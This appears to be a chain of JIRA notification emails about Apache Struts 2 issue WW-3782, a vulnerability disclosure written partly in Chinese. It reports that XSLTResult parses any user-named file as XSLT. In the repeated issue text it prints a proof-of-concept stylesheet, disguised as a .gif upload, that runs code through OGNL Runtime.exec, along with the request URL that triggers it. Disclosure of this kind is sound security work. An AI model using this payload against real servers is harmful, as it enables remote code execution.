> http://www.inbreak.net/xslt.action
>
> 那么,攻击者就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "kxlzx (Commented) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235441#comment-13235441 ]
kxlzx commented on WW-3782:
---------------------------
if applications code like:
<action name="xslt" class="net.inbreak.xsltAction">
<result type="xslt"/>
</action>
then ,The attacker can upload a file:
/upload/7758521.gif
<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.inbreak.net</h2>
<exp>
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
and open url
http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
then applications will execute
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
so,if an application use the xslt result.
local code execution vulnerability.
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 这段代码导致项目中只要有任何一个action使用了xsltResult,攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
> 示例一个使用了xsltResult的action:
> <action name="xslt" class="net.inbreak.xsltAction">
> <result type="xslt"/>
> </action>
> XSLT解析,允许执行java静态方法,所以,攻击者只要上传一个文件在服务器上
> 例如:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 那么,攻击者就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Resolved] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "Rene Gielen (Resolved) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Rene Gielen resolved WW-3782.
-----------------------------
Resolution: Not A Problem
In this case, the application developer is responsible for validating and securing user input / upload before processing. Evaluating expressions is the core feature in XSLT result, as it is in Freemarker etc., and it is designed for templates that reside on the server side.
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Minor
> Labels: patch
> Fix For: 2.3.2
>
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 这段代码导致项目中只要有任何一个action使用了xsltResult,攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
> 示例一个使用了xsltResult的action:
> <action name="xslt" class="net.inbreak.xsltAction">
> <result type="xslt"/>
> </action>
> XSLT解析,允许执行java静态方法,所以,攻击者只要上传一个文件在服务器上
> 例如:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 那么,攻击者就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Updated] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
Posted by "kxlzx (Updated) (JIRA)" <ji...@apache.org>.
[ https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
kxlzx updated WW-3782:
----------------------
Description:
http://www.inbreak.net/archives/319
Reporter : kxlzx , Alibaba Security Team
http://www.inbreak.net/
struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
这是XSLTResult文件代码:
http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
//获取用户提交的"xslt.location"的值
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
//解析用户提交的文件地址为xslt
templates = factory.newTemplates(new StreamSource(resource.openStream()));
这段代码导致项目中只要有任何一个action使用了xsltResult,攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
示例一个使用了xsltResult的action:
<action name="xslt" class="net.inbreak.xsltAction">
<result type="xslt"/>
</action>
XSLT解析,允许执行java静态方法,所以,攻击者只要上传一个文件在服务器上
例如:
/upload/7758521.gif
<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.inbreak.net</h2>
<exp>
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
这个xsl文件解析时,会调用ognl中的
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
导致执行任意代码。
一个xslt的返回action地址为
http://www.inbreak.net/xslt.action
那么,攻击者就可以提交
http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
就会变成
!https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
was:
http://www.inbreak.net/archives/319
Reporter : kxlzx , Alibaba Security Team
http://www.inbreak.net/
struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
这是XSLTResult文件代码:
http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
//获取用户提交的"xslt.location"的值
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
//解析用户提交的文件地址为xslt
templates = factory.newTemplates(new StreamSource(resource.openStream()));
而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
/upload/7758521.gif
<?xml version="1.0" encoding="UTF-8" ?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0" xmlns:ognl="ognl.Ognl">
<xsl:template match="/">
<html>
<body>
<h2>hacked by kxlzx</h2>
<h2>http://www.inbreak.net</h2>
<exp>
<xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
</exp>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
这个xsl文件解析时,会调用ognl中的
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
导致执行任意代码。
假设一个xslt的返回action地址为
http://www.inbreak.net/xslt.action
我们就可以提交
http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
就会变成
!https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
> Affects Versions: 2.3.1.2
> Reporter: kxlzx
> Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 这段代码导致项目中只要有任何一个action使用了xsltResult,攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
> 示例一个使用了xsltResult的action:
> <action name="xslt" class="net.inbreak.xsltAction">
> <result type="xslt"/>
> </action>
> XSLT解析,允许执行java静态方法,所以,攻击者只要上传一个文件在服务器上
> 例如:
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
> version="1.0" xmlns:ognl="ognl.Ognl">
> <xsl:template match="/">
> <html>
> <body>
> <h2>hacked by kxlzx</h2>
> <h2>http://www.inbreak.net</h2>
> <exp>
> <xsl:value-of select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
> </exp>
> </body>
> </html>
> </xsl:template>
> </xsl:stylesheet>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 那么,攻击者就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira